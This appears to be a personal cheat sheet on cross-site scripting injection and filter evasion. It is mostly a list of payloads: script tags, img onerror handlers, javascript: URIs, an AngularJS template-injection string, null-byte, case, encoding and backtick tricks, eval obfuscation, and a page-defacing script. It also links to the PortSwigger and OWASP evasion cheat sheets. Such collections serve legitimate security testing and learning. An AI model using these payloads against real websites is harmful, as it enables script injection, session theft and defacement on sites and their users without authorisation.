XSS Injection Technique & Evasion
Always try to enter DUM texte (ABC123) in parameters and in search query. Simply search on the page if this is reflected anywhere!
Website.com//feedback?returnPath=/ABC123
- Search Query
Content Security Policy (CSP)
- If you seem able to bypass some filter but cant get any popup, try diffrent event (onmouseover, onload, ...) and also try different variations of the script tag or evasion (javascript:,
<SCipt>
, ...)
Content-Security-Policy: default-src 'none'; script-src 'self'; style-src 'self'; img-src 'self';
Type
<script>alert('xss')</script>
<img src=x onerror=alert('1')>
javascript:alert(%27xss%27)
IMG
<img src=x>
<img src=1 onerror=alert(1)>
href
href="javascript:alert(1)"
DOM
location.search ---> Search in the URL for a parameter
write.document ---> This will write to the HTML (Adding something depending on the code)
- How to exploit: If you have a variable fetching for ID in the URL and then pasting this value to the HTML, you can create a DOM XSS
Other JS Language
# AngularJS
<body ng-app="" class="ng-scope"> ---> Interested in the ng-app
{{$on.constructor("alert(1)")()}} ---> Explained Below
- AngularJS
- the JavaScript
constructor
function to create a new object with a specified function as itsconstructor
attribute. The function being passed to theconstructor
attribute is analert
function that displays a message. The code then calls the object using the()
operator, causing thealert
function to be executed. PS: We can see the code on the page once it is executed
- the JavaScript
Evasion
Combinaison
‘`”//> <SCRIPT BLABLABLA> ---> Combinaison of the most popular evasion
Encoding
urlencode "http://example.com/?param=linux+url+encoder"
<img onerror="alert(1)"src=x>
<img onerror='alert(1)'src=x>
...
<script>Encoding</script> ---> %3Cscript%3EEncoding%3C%2Fscript%3E
- urlencode ---> Tool to encode url (Possible to encode many times)
Basic Modification
#Encoded tabs/newlines/CR
<script	>alert(1)</script>
<script
>alert(1)</script>
<script
>alert(1)</script>
#Capital letters
<ScRipT>alert(1)</sCriPt>
#If angle brackets are encoded
-alert(1)- ---> (-) replace (> or <)
Adding Nullbytes
<%00script>alert(1)</script>
<scr%00ipt>alert(1)</script>
Attributes and Tags
<input type="text" name="input" value="hello" >
<input type="text" name="input" value=">< script >alert(1)</script>
<randomtag type="text" name="input" value=">< script >alert(1)</script>
<input/type="text" name="input" value=">< script >alert(1)</script>
<input	type="text" name="input" value=">< script >alert(1)</script>
<input
type="text" name="input" value=">< script >alert(1)</script>
<input
type="text" name="input" value=">< script >alert(1)</script>
<input/'type="text" name="input" value=">< script >alert(1)</script>
<iNpUt type="text" name="input" value=">< script >alert(1)</script>
Attributes Nullbytes
<%00input type="text" name="input" value="><script>alert(1)</script>
<inp%00ut type="text" name="input" value="><script>alert(1)</script>
<input t%00ype="text" name="input" value="><script>alert(1)</script>
<input type="text" name="input" value="><script>a%00lert(1)</script>
Event Handler
<input onsubmit=alert(1)>
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
- https://portswigger.net/web-security/cross-site-scripting/cheat-sheet (opens in a new tab) (VERY GOOD)
Delimiters & Backticks and Brakers
#() to Backticks
<img onerror="alert(1)"src=x>
<img onerror='alert(1)'src=x>
#Backticks
<img onerror=`alert(1)`src=x>
#Encoded backtics
<img onerror=`alert(1)`src=x>
#Double use of delimiters
<<script>alert(1)//<</script>
#Unknown delimiters
«input onsubmit=alert(1)»
Oval ()
<script>eval('a\u006cert(1)')</script>
<script>eval('al' + 'ert(1)')</script>
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))</script>
Word Filter (If some javascript element is filtered)
<scrscriptipt > might become <script>
HTML Defacing
<script>document.querySelector('#thm-title').textContent = 'I am a hacker'</script>
All Information ---> https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html (opens in a new tab)